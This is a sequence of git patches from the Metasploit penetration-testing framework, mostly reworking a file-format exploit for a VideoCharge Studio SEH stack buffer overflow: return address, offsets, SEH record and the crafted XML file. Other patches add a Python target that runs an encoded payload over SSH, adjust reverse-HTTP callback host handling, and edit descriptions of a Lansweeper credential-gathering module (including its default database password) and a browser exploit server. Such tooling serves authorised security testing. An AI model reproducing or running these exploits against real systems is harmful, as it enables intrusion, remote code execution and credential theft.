index faa889eecb..c925e843a4 100644
--- a/lib/rex/ui/text/dispatcher_shell.rb
+++ b/lib/rex/ui/text/dispatcher_shell.rb
@@ -426,6 +426,7 @@ module DispatcherShell
     else
       dispatcher.send('cmd_' + method, *arguments)
     end
+  ensure
     self.busy = false
   end
 

From 4c28cae5d1cb16115b599b43fa7ac4b764487845 Mon Sep 17 00:00:00 2001
From: jakxx <jakx.ppr@gmail.com>
Date: Mon, 10 Aug 2015 18:38:23 -0400
Subject: [PATCH 0957/1013] updated to include recommendation from @zerosteiner

---
 modules/exploits/windows/fileformat/videocharge_studio.rb | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
index 58d3fb2132..6c2fe3dd6e 100644
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -9,11 +9,10 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Seh
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'    => 'VideoCharge Studio 2.12.3.685 Buffer Overflow (SEH)',
+      'Name'    => 'VideoCharge Studio Buffer Overflow (SEH)',
       'Description'  => %q{
           This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
           processing a specially crafted .VSC file. This vulnerability could be
@@ -29,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'OSVDB', '69616' ],
-          [ 'CVE', '' ],
           [ 'EBD', '29234' ]
         ],
       'DefaultOptions' =>
@@ -75,9 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
     buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
     buffer << "\x41" * (target['Offset']-payload.encoded.length)
     buffer << payload.encoded
-    buffer << "\xeb\x06\x90\x90" #nseh negative jump
+    buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2)
     buffer << [target.ret].pack("V")
-    buffer << "\xe9\x3f\xfd\xff\xff" #long jump
+    buffer << Rex::Arch::X86.jmp('$-444')
     buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
     buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
     buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"

From 7f0d992914ffbe0e27070d403df3543cf1c8f8a0 Mon Sep 17 00:00:00 2001
From: Mo Sadek <msadek@rapid7.com>
Date: Tue, 11 Aug 2015 11:51:52 -0500
Subject: [PATCH 0958/1013] Fixed name typo

---
 .../{local_exploit_suggestor.rb => local_exploit_suggester.rb}    | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/post/multi/recon/{local_exploit_suggestor.rb => local_exploit_suggester.rb} (100%)

diff --git a/modules/post/multi/recon/local_exploit_suggestor.rb b/modules/post/multi/recon/local_exploit_suggester.rb
similarity index 100%
rename from modules/post/multi/recon/local_exploit_suggestor.rb
rename to modules/post/multi/recon/local_exploit_suggester.rb

From 2b225b2e7e5fa1494d20ef642c83703878bf4e0d Mon Sep 17 00:00:00 2001
From: jakxx <jakx.ppr@gmail.com>
Date: Wed, 12 Aug 2015 01:34:45 -0400
Subject: [PATCH 0959/1013] Added changes per feedback

Updated to include and use seh mixin
changed offset and space for reliability
got rand_text buffer junk working
removed double spaces and stupid fillers in file data
---
 .../windows/fileformat/videocharge_studio.rb  | 31 +++++++++----------
 1 file changed, 15 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
index 6c2fe3dd6e..2600407969 100644
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
 
   def initialize(info = {})
     super(update_info(info,
@@ -39,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
           'DisableNops' => true,
+          'Space' => 1808
         },
 
       'Targets'    =>
@@ -46,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'VideoCharge Studio 2.12.3.685',
             {
               'Ret'     =>  0x61B811F1, #p/p/r | zlib1.dll
-              'Offset'  =>  824
+              'Offset'  =>  2184
             }
           ],
         ],
@@ -63,24 +65,21 @@ class Metasploit3 < Msf::Exploit::Remote
     buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
     buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
     buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
-    buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
-    buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
-    buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70"
-    buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A"
+    buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
+    buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
+    buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x3C\x50\x72\x6F\x70"
+    buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E"
     buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
-    buffer << "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
-    buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
+    buffer << "\x3E\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
+    buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
     buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
-    buffer << "\x41" * (target['Offset']-payload.encoded.length)
+    buffer << rand_text_alpha(target['Offset'])
+    buffer << generate_seh_record(target.ret)
     buffer << payload.encoded
-    buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2)
-    buffer << [target.ret].pack("V")
-    buffer << Rex::Arch::X86.jmp('$-444')
-    buffer << "\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F"
-    buffer << "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F"
-    buffer << "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F"
-    buffer << "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C"
-    buffer << "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
+    buffer << "\x22\x2F\x3E\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x3C\x2F"
+    buffer << "\x63\x6F\x6C\x73\x3E\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x22\x2F"
+    buffer << "\x3E\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x3C\x2F\x63\x6F\x6C"
+    buffer << "\x73\x3E\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(buffer)

From 979d7e6be3f7f3295b720a519c06066d9bc61f03 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Wed, 12 Aug 2015 15:37:37 +0200
Subject: [PATCH 0960/1013] improve module

---
 .../windows/fileformat/videocharge_studio.rb  | 50 +++++++++----------
 1 file changed, 23 insertions(+), 27 deletions(-)

diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
index 2600407969..44ba823483 100644
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -23,8 +23,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'    => MSF_LICENSE,
       'Author'    =>
         [
-          'metacom',  # Original discovery
-          'Andrew Smith',  # MSF Module
+          'metacom',            # Original discovery
+          'Andrew Smith',       # MSF module
+          'Christian Mehlmauer' # MSF module
         ],
       'References'  =>
         [
@@ -33,17 +34,16 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'ExitFunction' => 'process',
+          'EXITFUNC' => 'process'
         },
       'Platform'  => 'win',
-      'Payload'  =>
+      'Payload'   =>
         {
-          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+          'BadChars'    => "\x00\x0a\x0d\x3c\x22\x26",
           'DisableNops' => true,
-          'Space' => 1808
+          'Space'       => 2808
         },
-
-      'Targets'    =>
+      'Targets'   =>
         [
           [ 'VideoCharge Studio 2.12.3.685',
             {
@@ -62,28 +62,24 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
 
-    buffer = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22"
-    buffer << "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32"
-    buffer << "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E"
-    buffer << "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D"
-    buffer << "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61"
-    buffer << "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x3C\x50\x72\x6F\x70"
-    buffer << "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E"
-    buffer << "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22"
-    buffer << "\x3E\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74"
-    buffer << "\x72\x65\x61\x6D\x22\x3E\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22"
-    buffer << "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22"
-    buffer << rand_text_alpha(target['Offset'])
+    buffer  = rand_text_alpha(target['Offset'])
     buffer << generate_seh_record(target.ret)
     buffer << payload.encoded
-    buffer << "\x22\x2F\x3E\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x3C\x2F"
-    buffer << "\x63\x6F\x6C\x73\x3E\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x22\x2F"
-    buffer << "\x3E\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x3C\x2F\x63\x6F\x6C"
-    buffer << "\x73\x3E\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E"
 
-    print_status("Creating '#{datastore['FILENAME']}' file ...")
-    file_create(buffer)
+    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685">
+<cols name="Files"/>
+<cols name="Profiles">
+<Property name="Profile">
+<cols name="Formats">
+<Property name="Stream">
+<Value name="Name" type="8" value="#{buffer}"/>
+</Property>
+</cols>
+</Property>
+</cols>
+</config>|
+
+    file_create(file)
 
   end
 end
-

From dfe2bbf1e9fe85ba79c2f4e3f6bc63dd6036be4b Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 12 Aug 2015 15:46:47 -0400
Subject: [PATCH 0961/1013] Add a python target to the sshexec module

---
 modules/exploits/multi/ssh/sshexec.rb | 58 ++++++++++++++++-----------
 1 file changed, 35 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index fe6d7c1d67..0e708a6f59 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -15,56 +15,62 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize
     super(
-      'Name'        => 'SSH User Code Execution',
-      'Description' => %q{
-        This module utilizes a stager to upload a base64 encoded
+      'Name'             => 'SSH User Code Execution',
+      'Description'      => %q{
+        This module utilizes a stager to upload an encoded
         binary which is then decoded, chmod'ed and executed from
         the command shell.
       },
-      'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
-      'References'  =>
+      'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
+      'References'       =>
         [
           [ 'CVE', '1999-0502'] # Weak password
         ],
-      'License'     => MSF_LICENSE,
-      'Privileged'  => true,
-      'DefaultOptions' =>
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'DefaultOptions'   =>
         {
-          'PrependFork' => 'true',
-          'EXITFUNC' => 'process'
+          'PrependFork'  => 'true',
+          'EXITFUNC'     => 'process'
         },
-      'Payload'     =>
+      'Payload'          =>
         {
-          'Space'    => 4096,
-          'BadChars' => "",
-          'DisableNops' => true
+          'Space'        => 4096,
+          'BadChars'     => "",
+          'DisableNops'  => true
         },
-      'Platform'    => %w{ linux osx },
-      'Targets'     =>
+      'Platform'         => %w{ linux osx python },
+      'Targets'          =>
         [
           [ 'Linux x86',
             {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
               'Platform' => 'linux'
             }
           ],
           [ 'Linux x64',
             {
-              'Arch' => ARCH_X86_64,
+              'Arch'     => ARCH_X86_64,
               'Platform' => 'linux'
             }
           ],
           [ 'OSX x86',
             {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
               'Platform' => 'osx'
             }
+          ],
+          [ 'Python',
+            {
+              'Arch'     => ARCH_PYTHON,
+              'Platform' => 'python'
+            }
           ]
         ],
-      'CmdStagerFlavor' => %w{ bourne echo printf },
-      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'  => %w{ bourne echo printf },
+      'DefaultTarget'    => 0,
       # For the CVE
-      'DisclosureDate' => 'Jan 01 1999'
+      'DisclosureDate'   => 'Jan 01 1999'
     )
 
     register_options(
@@ -128,6 +134,12 @@ class Metasploit3 < Msf::Exploit::Remote
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
-    execute_cmdstager({:linemax => 500})
+    if target['Platform'] == 'python'
+      execute_command("python -c \"#{payload.encoded}\"")
+    else
+      execute_cmdstager({:linemax => 500})
+    end
+
+    self.ssh_socket.close
   end
 end

From 28fbb7cdde87ac378f2e32c1bebd39aa22d1ae42 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 12 Aug 2015 16:05:09 -0400
Subject: [PATCH 0962/1013] Update the description of the sshexec module

---
 modules/exploits/multi/ssh/sshexec.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb
index 0e708a6f59..582fd47035 100644
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(
       'Name'             => 'SSH User Code Execution',
       'Description'      => %q{
-        This module utilizes a stager to upload an encoded
-        binary which is then decoded, chmod'ed and executed from
-        the command shell.
+        This module connects to the target system and executes the necessary
+        commands to run the specified payload via SSH. If a native payload is
+        specified an appropriate stager will be used.
       },
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>

From e7566d6aeeb219db95f1f2f7cbe0cdb38f96e839 Mon Sep 17 00:00:00 2001
From: jakxx <jakx.ppr@gmail.com>
Date: Wed, 12 Aug 2015 16:08:04 -0400
Subject: [PATCH 0963/1013] Adding print_status line

---
 modules/exploits/windows/fileformat/videocharge_studio.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb
index 44ba823483..68cbfde4ef 100644
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -79,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </cols>
 </config>|
 
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(file)
 
   end

From 53e747ce2e986fa6dfbcb72784f3db0d8013c7a8 Mon Sep 17 00:00:00 2001
From: Greg Mikeska <greg_mikeska@rapid7.com>
Date: Wed, 12 Aug 2015 15:35:03 -0500
Subject: [PATCH 0964/1013] added infer_vuln_from_session to other valid case
 MSP-13064

---
 lib/msf/core/db_manager/session.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/db_manager/session.rb b/lib/msf/core/db_manager/session.rb
index fff0140739..455d482cc7 100644
--- a/lib/msf/core/db_manager/session.rb
+++ b/lib/msf/core/db_manager/session.rb
@@ -98,6 +98,7 @@ module Msf::DBManager::Session
           run: session.exploit.user_data[:run],
           state: 'succeeded',
         )
+        infer_vuln_from_session(session, wspace)
       elsif session.via_exploit
         # This is a live session, we know the host is vulnerable to something.
         infer_vuln_from_session(session, wspace)

From 01b3ae2dd88778fbfed14b4dd8d85165ec15a405 Mon Sep 17 00:00:00 2001
From: Greg Mikeska <greg_mikeska@rapid7.com>
Date: Wed, 12 Aug 2015 15:43:16 -0500
Subject: [PATCH 0965/1013] Revert "added infer_vuln_from_session to other
 valid case"

This reverts commit 53e747ce2e986fa6dfbcb72784f3db0d8013c7a8.
---
 lib/msf/core/db_manager/session.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/db_manager/session.rb b/lib/msf/core/db_manager/session.rb
index 455d482cc7..fff0140739 100644
--- a/lib/msf/core/db_manager/session.rb
+++ b/lib/msf/core/db_manager/session.rb
@@ -98,7 +98,6 @@ module Msf::DBManager::Session
           run: session.exploit.user_data[:run],
           state: 'succeeded',
         )
-        infer_vuln_from_session(session, wspace)
       elsif session.via_exploit
         # This is a live session, we know the host is vulnerable to something.
         infer_vuln_from_session(session, wspace)

From 790356bac80405215c2bdf9d1e22f6b476da48fb Mon Sep 17 00:00:00 2001
From: Greg Mikeska <greg_mikeska@rapid7.com>
Date: Wed, 12 Aug 2015 15:45:37 -0500
Subject: [PATCH 0966/1013] add infer_vuln_from_session to other valid case
 MSP-13065

---
 lib/msf/core/db_manager/session.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/db_manager/session.rb b/lib/msf/core/db_manager/session.rb
index fff0140739..455d482cc7 100644
--- a/lib/msf/core/db_manager/session.rb
+++ b/lib/msf/core/db_manager/session.rb
@@ -98,6 +98,7 @@ module Msf::DBManager::Session
           run: session.exploit.user_data[:run],
           state: 'succeeded',
         )
+        infer_vuln_from_session(session, wspace)
       elsif session.via_exploit
         # This is a live session, we know the host is vulnerable to something.
         infer_vuln_from_session(session, wspace)

From e9203060b0e16b2ab4c68a1bc526217b53907347 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 12 Aug 2015 16:20:14 -0500
Subject: [PATCH 0967/1013] Allow the hostname and port to be overridden,
 necessary for complex NAT setups

---
 lib/msf/core/handler/reverse_http.rb | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 51ed995647..74324df75e 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -55,7 +55,9 @@ module ReverseHttp
         OptString.new('MeterpreterServerName', [false, 'The server header that the handler will send in response to requests', 'Apache']),
         OptAddress.new('ReverseListenerBindAddress', [false, 'The specific IP address to bind to on the local system']),
         OptInt.new('ReverseListenerBindPort', [false, 'The port to bind to on the local system if different from LPORT']),
-        OptBool.new('OverrideRequestHost', [false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false]),
+        OptBool.new('OverrideRequestHost', [false, 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', false]),
+        OptString.new('OverrideLHOST', [false, 'When OverrideRequestHost is set, use this value as the host name for secondary requests']),
+        OptPort.new('OverrideLPORT', [false, 'When OverrideRequestHost is set, use this value as the port number for secondary requests']),
         OptString.new('HttpUnknownRequestResponse', [false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>']),
         OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false])
       ], Msf::Handler::ReverseHttp)
@@ -89,13 +91,23 @@ module ReverseHttp
   #
   # @return [String] A URI of the form +scheme://host:port/+
   def payload_uri(req)
-    if req and req.headers and req.headers['Host'] and not datastore['OverrideRequestHost']
+    callback_host = nil
+
+    # Extract whatever the client sent us in the Host header
+    if req and req.headers and req.headers['Host']
       callback_host = req.headers['Host']
-    elsif Rex::Socket.is_ipv6?(datastore['LHOST'])
-      callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"
-    else
-      callback_host = "#{datastore['LHOST']}:#{datastore['LPORT']}"
     end
+
+    # Override these host and port as appropriate
+    if datastore['OverrideRequestHost'] || callback_host.nil?
+      callback_name = datastore['OverrideLHOST'] || datastore['LHOST']
+      callback_port = datastore['OverrideLPORT'] || datastore['LPORT']
+      if Rex::Socket.is_ipv6? callback_name
+        callback_name = "[#{callback_name}]"
+      end
+      callback_host = "#{callback_name}:#{callback_port}"
+    end
+
     "#{scheme}://#{callback_host}/"
   end
 

From 6e75db090f1b13217cfe0f808dc5506d43f09d94 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 12 Aug 2015 21:11:48 -0500
Subject: [PATCH 0968/1013] Fix comment

---
 lib/msf/core/handler/reverse_http.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 74324df75e..6a92c6e416 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -98,7 +98,7 @@ module ReverseHttp
       callback_host = req.headers['Host']
     end
 
-    # Override these host and port as appropriate
+    # Override the host and port as appropriate
     if datastore['OverrideRequestHost'] || callback_host.nil?
       callback_name = datastore['OverrideLHOST'] || datastore['LHOST']
       callback_port = datastore['OverrideLPORT'] || datastore['LPORT']

From 50041fad2a28867502d784bd4e35ef869a75e3a8 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 13 Aug 2015 12:33:04 -0500
Subject: [PATCH 0969/1013] Pre-Bloggery cleanup

Edited modules/auxiliary/gather/lansweeper_collector.rb first landed in
and minor description word choice changes.

Edited modules/auxiliary/server/browser_autopwn2.rb first landed in
options. Also removed from the description the missing options of
'WhiteList' and 'RealList' -- those don't appear to be available
according to `show options` and `show advanced`, @wchen-r7.

Edited modules/post/multi/recon/local_exploit_suggester.rb first landed
in #5823, mv local_exploit_{suggestor,suggester} for minor description
cleanup and axing the description of the SHOWDESCRIPTION option (it's
already described identically on the option itself).
---
 .../auxiliary/gather/lansweeper_collector.rb   | 16 +++++++++-------
 modules/auxiliary/server/browser_autopwn2.rb   | 18 ++++++------------
 .../multi/recon/local_exploit_suggester.rb     |  5 ++---
 3 files changed, 17 insertions(+), 22 deletions(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index 7a523bea6b..484c796beb 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -6,14 +6,16 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'Lansweeper Collector',
+      'Name' => 'Lansweeper Credential Collector',
       'Description' => %q(
-        Lansweeper stores the credentials it uses to scan the computers in its MSSQL database.
-        The passwords are XTea-encrypted with a 68 character long key, which first 8 character
-        are stored with the password in the database, and the other 60 is static. Lansweeper by
-        default creates an MSSQL user "lansweeperuser" whose password is "mysecretpassword0*",
-        and stores its data in a database called "lansweeperdb". This module will query the MSSQL
-        database for the credentials.
+        Lansweeper stores the credentials it uses to scan the computers
+        in its Microsoft SQL database.  The passwords are XTea-encrypted with a
+        68 character long key, in which the first 8 characters are stored with
+        the password in the database and the other 60 is static. Lansweeper, by
+        default, creates an MSSQL user "lansweeperuser" with the password is
+        "mysecretpassword0*", and stores its data in a database called
+        "lansweeperdb". This module will query the MSSQL database for the
+        credentials.
       ),
       'Author' =>
         [
diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index a388e1ce59..1c28beee94 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -15,35 +15,29 @@ class Metasploit3 < Msf::Auxiliary
         This module will automatically serve browser exploits. Here are the options you can
         configure:
 
-        The Include option allows you to specify the kind of exploits to be loaded. For example,
+        The INCLUDE_PATTERN option allows you to specify the kind of exploits to be loaded. For example,
         if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.
 
-        The Exclude option will ignore exploits. For example, if you don't want any Adobe Flash
+        The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash
         exploits, you can set this. Also note that the Exclude option will always be evaludated
         after the Include option.
 
-        The MaxExploits option specifies the max number of exploits to load by Browser Autopwn.
+        The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn.
         By default, 20 will be loaded. But note that the client will probably not be vulnerable
         to all 20 of them, so only some will actually be served to the client.
 
-        The Content option allows you to provide a basic webpage. This is what the user behind
+        The HTMLContent option allows you to provide a basic webpage. This is what the user behind
         the vulnerable browser will see. You can simply set a string, or you can do the file://
         syntax to load an HTML file. Note this option might break exploits so try to keep it
         as simple as possible.
 
-        The WhiteList option can be used to avoid visitors that are outside the scope of your
-        pentest engagement. IPs that are not on the list will not be attacked.
-
-        The MaxSessions option is used to limit how many sessions Browser Autopwn is allowed to
+        The MaxSessionCount option is used to limit how many sessions Browser Autopwn is allowed to
         get. The default -1 means unlimited. Combining this with other options such as RealList
         and Custom404, you can get information about which visitors (IPs) clicked on your malicious
         link, what exploits they might be vulnerable to, redirect them to your own internal
         training website without actually attacking them.
 
-        The RealList is an option that will list what exploits the client might be vulnerable to
-        based on basic browser information. If possible, you can run the exploits for validation.
-
-        For more information about Browser Autopwn, please see the reference link.
+        For more information about Browser Autopwn, please see the referenced blog post.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'sinn3r' ],
diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb
index 64962b4ac6..45b15e312c 100644
--- a/modules/post/multi/recon/local_exploit_suggester.rb
+++ b/modules/post/multi/recon/local_exploit_suggester.rb
@@ -14,11 +14,10 @@ class Metasploit3 < Msf::Post
           This module suggests local meterpreter exploits that can be used. The
           exploits are suggested based on the architecture and platform that
           the user has a shell opened as well as the available exploits in
